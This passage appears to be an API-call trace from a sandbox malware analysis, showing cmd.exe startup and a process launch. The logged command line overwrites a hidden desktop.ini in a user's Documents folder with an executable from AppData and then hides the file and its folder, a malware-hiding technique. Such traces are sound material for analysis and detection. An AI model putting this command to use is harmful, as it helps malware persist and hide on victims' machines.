Type=0x0)) returned 0x1c [0131.803] GetConsoleOutputCP () returned 0x1b5 [0131.803] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.803] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0131.803] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.803] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0131.803] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.803] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0131.803] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.803] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0131.804] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.804] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0131.804] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.804] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0131.804] GetEnvironmentStringsW () returned 0x3b0508* [0131.804] FreeEnvironmentStringsW (penv=0x3b0508) returned 1 [0131.804] GetEnvironmentStringsW () returned 0x3b0508* [0131.804] FreeEnvironmentStringsW (penv=0x3b0508) returned 1 [0131.804] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce7cc | out: phkResult=0x2ce7cc*=0x40) returned 0x0 [0131.804] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce7d4, lpData=0x2ce7d8, lpcbData=0x2ce7d0*=0x1000 | out: lpType=0x2ce7d4*=0x0, lpData=0x2ce7d8*=0xb8, lpcbData=0x2ce7d0*=0x1000) returned 0x2 [0131.804] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce7d4, lpData=0x2ce7d8, lpcbData=0x2ce7d0*=0x1000 | out: lpType=0x2ce7d4*=0x4, lpData=0x2ce7d8*=0x1, lpcbData=0x2ce7d0*=0x4) returned 0x0 [0131.804] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce7d4, lpData=0x2ce7d8, lpcbData=0x2ce7d0*=0x1000 | out: lpType=0x2ce7d4*=0x0, lpData=0x2ce7d8*=0x1, lpcbData=0x2ce7d0*=0x1000) returned 0x2 [0131.804] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce7d4, lpData=0x2ce7d8, lpcbData=0x2ce7d0*=0x1000 | out: lpType=0x2ce7d4*=0x4, lpData=0x2ce7d8*=0x0, lpcbData=0x2ce7d0*=0x4) returned 0x0 [0131.804] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce7d4, lpData=0x2ce7d8, lpcbData=0x2ce7d0*=0x1000 | out: lpType=0x2ce7d4*=0x4, lpData=0x2ce7d8*=0x40, lpcbData=0x2ce7d0*=0x4) returned 0x0 [0131.804] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce7d4, lpData=0x2ce7d8, lpcbData=0x2ce7d0*=0x1000 | out: lpType=0x2ce7d4*=0x4, lpData=0x2ce7d8*=0x40, lpcbData=0x2ce7d0*=0x4) returned 0x0 [0131.805] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce7d4, lpData=0x2ce7d8, lpcbData=0x2ce7d0*=0x1000 | out: lpType=0x2ce7d4*=0x0, lpData=0x2ce7d8*=0x40, lpcbData=0x2ce7d0*=0x1000) returned 0x2 [0131.805] RegCloseKey (hKey=0x40) returned 0x0 [0131.805] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce7cc | out: phkResult=0x2ce7cc*=0x40) returned 0x0 [0131.805] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce7d4, lpData=0x2ce7d8, lpcbData=0x2ce7d0*=0x1000 | out: lpType=0x2ce7d4*=0x0, lpData=0x2ce7d8*=0x40, lpcbData=0x2ce7d0*=0x1000) returned 0x2 [0131.805] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce7d4, lpData=0x2ce7d8, lpcbData=0x2ce7d0*=0x1000 | out: lpType=0x2ce7d4*=0x4, lpData=0x2ce7d8*=0x1, lpcbData=0x2ce7d0*=0x4) returned 0x0 [0131.805] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce7d4, lpData=0x2ce7d8, lpcbData=0x2ce7d0*=0x1000 | out: lpType=0x2ce7d4*=0x0, lpData=0x2ce7d8*=0x1, lpcbData=0x2ce7d0*=0x1000) returned 0x2 [0131.805] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce7d4, lpData=0x2ce7d8, lpcbData=0x2ce7d0*=0x1000 | out: lpType=0x2ce7d4*=0x4, lpData=0x2ce7d8*=0x0, lpcbData=0x2ce7d0*=0x4) returned 0x0 [0131.805] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce7d4, lpData=0x2ce7d8, lpcbData=0x2ce7d0*=0x1000 | out: lpType=0x2ce7d4*=0x4, lpData=0x2ce7d8*=0x9, lpcbData=0x2ce7d0*=0x4) returned 0x0 [0131.805] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce7d4, lpData=0x2ce7d8, lpcbData=0x2ce7d0*=0x1000 | out: lpType=0x2ce7d4*=0x4, lpData=0x2ce7d8*=0x9, lpcbData=0x2ce7d0*=0x4) returned 0x0 [0131.805] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce7d4, lpData=0x2ce7d8, lpcbData=0x2ce7d0*=0x1000 | out: lpType=0x2ce7d4*=0x0, lpData=0x2ce7d8*=0x9, lpcbData=0x2ce7d0*=0x1000) returned 0x2 [0131.805] RegCloseKey (hKey=0x40) returned 0x0 [0131.805] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886366 [0131.805] srand (_Seed=0x5b886366) [0131.805] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\"" [0131.805] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\"" [0131.805] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.805] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3b1c68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0131.806] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0131.806] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0131.806] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0131.806] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0131.806] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0131.806] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0131.806] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0131.806] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0131.806] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0131.806] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0131.806] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0131.806] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0131.806] GetEnvironmentStringsW () returned 0x3b2658* [0131.806] FreeEnvironmentStringsW (penv=0x3b2658) returned 1 [0131.806] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.806] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0131.806] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0131.806] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0131.806] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0131.806] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0131.806] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0131.806] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0131.806] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0131.806] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0131.806] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf598 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.806] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf598, lpFilePart=0x2cf594 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf594*="Desktop") returned 0x18 [0131.806] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0131.806] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf314 | out: lpFindFileData=0x2cf314) returned 0x3b0ce8 [0131.807] FindClose (in: hFindFile=0x3b0ce8 | out: hFindFile=0x3b0ce8) returned 1 [0131.807] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf314 | out: lpFindFileData=0x2cf314) returned 0x3b0ce8 [0131.807] FindClose (in: hFindFile=0x3b0ce8 | out: hFindFile=0x3b0ce8) returned 1 [0131.807] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf314 | out: lpFindFileData=0x2cf314) returned 0x3b0ce8 [0131.807] FindClose (in: hFindFile=0x3b0ce8 | out: hFindFile=0x3b0ce8) returned 1 [0131.807] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0131.807] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0131.807] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0131.807] GetEnvironmentStringsW () returned 0x3b0508* [0131.808] FreeEnvironmentStringsW (penv=0x3b0508) returned 1 [0131.808] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.808] GetConsoleOutputCP () returned 0x1b5 [0131.808] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.808] GetUserDefaultLCID () returned 0x409 [0131.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0131.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf6d8, cchData=128 | out: lpLCData="0") returned 2 [0131.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf6d8, cchData=128 | out: lpLCData="0") returned 2 [0131.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf6d8, cchData=128 | out: lpLCData="1") returned 2 [0131.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0131.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0131.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0131.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0131.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0131.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0131.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0131.809] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0131.809] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0131.809] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0131.809] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0131.810] GetConsoleTitleW (in: lpConsoleTitle=0x3a0b10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.810] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0131.810] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0131.810] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0131.810] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0131.811] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0131.811] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0131.811] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0131.811] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0131.811] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0131.811] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0131.811] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0131.814] _wcsicmp (_String1="del", _String2=")") returned 59 [0131.814] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0131.814] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0131.814] _wcsicmp (_String1="IF", _String2="del") returned 5 [0131.814] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0131.814] _wcsicmp (_String1="REM", _String2="del") returned 14 [0131.814] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0131.816] _wcsicmp (_String1="type", _String2=")") returned 75 [0131.816] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0131.816] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0131.816] _wcsicmp (_String1="IF", _String2="type") returned -11 [0131.816] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0131.816] _wcsicmp (_String1="REM", _String2="type") returned -2 [0131.816] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0131.820] SetErrorMode (uMode=0x0) returned 0x0 [0131.820] SetErrorMode (uMode=0x1) returned 0x0 [0131.820] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3b0510, lpFilePart=0x2cee8c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cee8c*="Desktop") returned 0x18 [0131.820] SetErrorMode (uMode=0x0) returned 0x1 [0131.820] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0131.820] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0131.825] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0131.826] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2cec08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cec08) returned 0xffffffff [0131.826] GetLastError () returned 0x2 [0131.826] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2cec08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cec08) returned 0xffffffff [0131.826] GetLastError () returned 0x2 [0131.826] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2cec08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cec08) returned 0x3b07f8 [0131.826] FindClose (in: hFindFile=0x3b07f8 | out: hFindFile=0x3b07f8) returned 1 [0131.826] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2cec08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cec08) returned 0xffffffff [0131.826] GetLastError () returned 0x2 [0131.826] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2cec08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cec08) returned 0x3b07f8 [0131.827] FindClose (in: hFindFile=0x3b07f8 | out: hFindFile=0x3b07f8) returned 1 [0131.827] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0131.827] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0131.827] GetConsoleTitleW (in: lpConsoleTitle=0x2cf100, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.941] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cef88, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf050 | out: lpAttributeList=0x2cef88, lpSize=0x2cf050) returned 1 [0131.941] UpdateProcThreadAttribute (in: lpAttributeList=0x2cef88, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf048, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cef88, lpPreviousValue=0x0) returned 1 [0131.941] GetStartupInfoW (in: lpStartupInfo=0x2cef44 | out: lpStartupInfo=0x2cef44*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0131.941] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0131.942] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2cefe4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf030 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" ", lpProcessInformation=0x2cf030*(hProcess=0x50, hThread=0x4c, dwProcessId=0xb2c, dwThreadId=0xaf4)) returned 1 [0132.053] CloseHandle (hObject=0x4c) returned 1 [0132.053] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0132.053] GetEnvironmentStringsW () returned 0x3b0a38* [0132.053] FreeEnvironmentStringsW (penv=0x3b0a38) returned 1 [0132.053] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0132.228] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2cef24 | out: lpExitCode=0x2cef24*=0x0) returned 1 [0132.228] CloseHandle (hObject=0x50) returned 1 [0132.228] _vsnwprintf (in: _Buffer=0x2cf06c, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cef30 | out: _Buffer="00000000") returned 8 [0132.228] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0132.228] GetEnvironmentStringsW () returned 0x3b2658* [0132.228] FreeEnvironmentStringsW (penv=0x3b2658) returned 1 [0132.228] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0132.228] GetEnvironmentStringsW () returned 0x3b2658* [0132.228] FreeEnvironmentStringsW (penv=0x3b2658) returned 1 [0132.228] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cef88 | out: lpAttributeList=0x2cef88) [0132.228] GetConsoleTitleW (in: lpConsoleTitle=0x2cf308, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.228] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2ce380, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x2ce384, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2ce380*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0132.229] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0132.229] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0132.229] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0132.229] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\desktop.ini")) returned 0xffffffff [0132.229] GetLastError () returned 0x2 [0132.229] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1")) returned 0x10 [0132.229] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0132.229] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0132.229] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\desktop.ini")) returned 0xffffffff [0132.229] GetLastError () returned 0x2 [0132.229] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x3b36e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3b36e4) returned 0xffffffff [0132.229] GetLastError () returned 0x2 [0132.229] _get_osfhandle (_FileHandle=2) returned 0xb [0132.230] GetFileType (hFile=0xb) returned 0x2 [0132.230] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0132.230] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2ced80 | out: lpMode=0x2ced80) returned 1 [0132.230] _get_osfhandle (_FileHandle=2) returned 0xb [0132.230] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2cedb4 | out: lpConsoleScreenBufferInfo=0x2cedb4) returned 1 [0132.230] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0132.231] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.231] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.231] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.231] GetFileType (hFile=0x7) returned 0x2 [0132.231] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0132.231] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf4a4 | out: lpMode=0x2cf4a4) returned 1 [0132.231] _dup (_FileHandle=1) returned 3 [0132.231] _close (_FileHandle=1) returned 0 [0132.231] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini", _String2="con") returned -53 [0132.231] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2cf474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0132.233] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0132.233] GetConsoleTitleW (in: lpConsoleTitle=0x2cf2a4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.233] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x2cee08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee08) returned 0x3ae6d8 [0132.233] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0132.233] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0132.233] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0132.233] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2cdd14, dwCreationDisposition=0x3, 